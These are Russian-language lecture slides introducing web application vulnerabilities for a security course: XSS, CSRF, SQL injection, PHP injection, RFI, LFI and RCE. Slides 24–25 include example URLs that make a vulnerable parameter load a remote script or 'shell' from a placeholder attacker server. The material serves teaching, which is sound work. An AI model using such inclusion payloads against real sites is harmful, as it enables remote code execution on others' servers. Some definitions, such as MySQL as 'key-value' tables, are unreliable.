Уязвимости веб-приложений. Лекция 6. Программно-аппаратные средства защиты информации

1. Уязвимости веб-приложений

Уязвимости вебприложений
Лекция 6.
Программно-аппаратные средства защиты информации

2. 2//Повторение

• Что такое HTML? Что такое HTTP? В чем разница?

3. 3//Повторение

• Что такое HTML? Что такое HTTP? В чем разница?
• HTML - стандартизированный язык разметки документов для
просмотра веб-страниц в браузере. HTTP – протокол просмотра
веб-страниц в сети Интернет

4. 4//Повторение

• Что такое HTML? Что такое HTTP? В чем разница?
• HTML - стандартизированный язык разметки документов для
просмотра веб-страниц в браузере. HTTP – протокол просмотра
веб-страниц в сети Интернет
• Что такое CSS? Для чего необходима? Что такое Bootstrap?

5. 5//Повторение

• Что такое HTML? Что такое HTTP? В чем разница?
• HTML - стандартизированный язык разметки документов для
просмотра веб-страниц в браузере. HTTP – протокол просмотра
веб-страниц в сети Интернет
• Что такое CSS? Для чего необходима? Что такое Bootstrap?
• CSS – язык для оформления HTML-документов, помогает улучшить
внешний вид страницы, написанной с использованием языка
разметки. Bootstrap – один из CSS-фреймворков

6. 6//Повторение

• Расшифруйте аббревиатуру LAMP? Где используется?

7. 7//Повторение

• Расшифруйте аббревиатуру LAMP? Где используется?
• LAMP – Linux, Apache, MqSQL, PHP. Используется для создания
веб-сервера

8. 8//Повторение

• Расшифруйте аббревиатуру LAMP? Где используется?
• LAMP – Linux, Apache, MqSQL, PHP. Используется для создания
веб-сервера
• Что такое MySQL? К каким типам СУБД относится?

9. 9//Повторение

• Расшифруйте аббревиатуру LAMP? Где используется?
• LAMP – Linux, Apache, MqSQL, PHP. Используется для создания
веб-сервера
• Что такое MySQL? К каким типам СУБД относится?
• MySQL – реляционная СУБД, которая позволяет создавать базы
данных из таблиц ключ-значение.

10. 10//Повторение

• Расшифруйте аббревиатуру LAMP? Где используется?
• LAMP – Linux, Apache, MqSQL, PHP. Используется для создания
веб-сервера
• Что такое MySQL? К каким типам СУБД относится?
• MySQL – реляционная СУБД, которая позволяет создавать базы
данных из таблиц ключ-значение.

11. 11//Burp Suite

• Burp Suite — это платформа, предназначенная для проведения
аудита веб-приложения

12. 12//OWASP Top-10

• We are planning to announce the release of the OWASP Top 10:2025
in the first half of 2025.

13. 13//XSS-инъекция

• Cross-site scripting (XSS) - это уязвимость позволяющая
злоумышленникам внедрять вредоносные скрипты на вебстраницы

14. 14//XSS-инъекция (отраженная)

• Происходит, когда
злоумышленник
отправляет жертве
ссылку с вредоносным
кодом в параметрах URL.
При переходе код
выполняется в ее
браузере.

15. 15//XSS-инъекция (отраженная)

16. 16//XSS-инъекция (хранимая)

• Вредоносный скрипт
сохраняется на сервере
веб-приложения и
выполняется при каждом
обращении
пользователей

17. 17//XSS-инъекция (хранимая)

18. 18//DOM-based инъекция

• Вредоносный скрипт
изменяет среду
выполнения DOM
(Document Object Model –
HTML-код страницы), что
приводит к выполнению
скрипта без прямого
внедрения кода в HTML

19. 19//DOM-based инъекция

20. 20//CSRF

• CSRF (cross-site request forgery) — вид атак на сайт, при которой
злоумышленник с помощью мошеннического сайта или скрипта
заставляет браузер пользователя выполнять на доверенном
сайте действия от его имени: отправлять сообщения, менять
пароли, переводить деньги со счета на счет и пр.

21. 21//SQL-Injection

• SQL-инъекция или SQLi –
• Классическая
уязвимость, которая позволяет • Error-based
атакующему использовать
фрагмент вредоносного кода на • Boolean-based
• Time-based
языке структурированных
запросов (SQL) для
• Out-of-band
манипулирования базой
данных и получения доступа к
потенциально ценной
информации.

22. 22//SQL-Injection

23. 23//PHP-Injection

• один из способов взлома веб-сайтов, работающих на PHP, заключающийся в
выполнении постороннего кода на серверной стороне.
• Работает благодаря использованию разработчиком сайта небезопасных
операторов:
• eval(),
• preg_replace(),
• require_once(),
• include_once(),
• include(),
• require(),
• create_function().

24. 24//PHP-Injection

• http :
//www.атакуемый_сайт.com/index.php?page=http://www.атаку
ющий_серв.com/вредоносный_скрипт.txt?

25. 25//RFI

• http : //www.атакуемый_сервер.com/index.php?page=abcd
`Warning : main (abcd . php ): failed to open stream : No such
file or directory in / home / user / www
[//page.php](https://page.php/) on line 3`
`Warning : main (abcd . php ): failed to open stream : No such
file or directory in / home / user / www / page . php on line 3`
`Warning : main (): Failed opening "abcd.php" for inclusion
(include_path =
".:/usr/lib/php:/usr/local/lib/php:/usr/local/share/pear" ) in /
home / user / www / page . php on line 3`
http : //www.атакуемый_сервер.com/index.php?file=http://www.сайт_злоумышленника.com/shell

26. 26//LFI

• LFI - это возможность использования и выполнения локальных
файлов на серверной стороне.

27. 27//LFI

28. 28//LFI

29. 29//RCE

• RCE – это самая серьезная уязвимость на веб-сервере,
позволяющая получить атакующему:
• Первоначальный доступ на сервер
• Раскрытие информации о системе, утечка данных
• Отказ в обслуживании
• Криптомайнинг
• Ransomware (вымогательство)

30. 30//RCE

• RCE можно достичь следующими атаками:
1 – Инъекционные атаки
2 – Атаки на десериализацию
3 – Различного рода переполнения
• Уязвимый PHP-код

31. 31//RCE

• Уязвимый Java-код
• Уязвимый C#-код

32. 32//OWASP Top-10

• OWASP Top 10 – это отчет или информационный документ, в
котором перечислены основные проблемы, связанные с
безопасностью веб-приложений.

33. 33//OWASP Top-10

34. 34//OWASP Top-10 в России

• В России подобного перечня нет, опираемся на международный
опыт, но есть банк данных угроз безопасности информации
ФСТЭК России (БДУ ФСТЭК России)

35. 35//Контрольные вопросы

• Что такое уязвимость?
• Почему сайты содержат уязвимости? Чем можно проверять вебприложения на наличие уязвимостей?
• Что такое OWASP Top-10?
• Приведите примеры уязвимостей? Как они работают?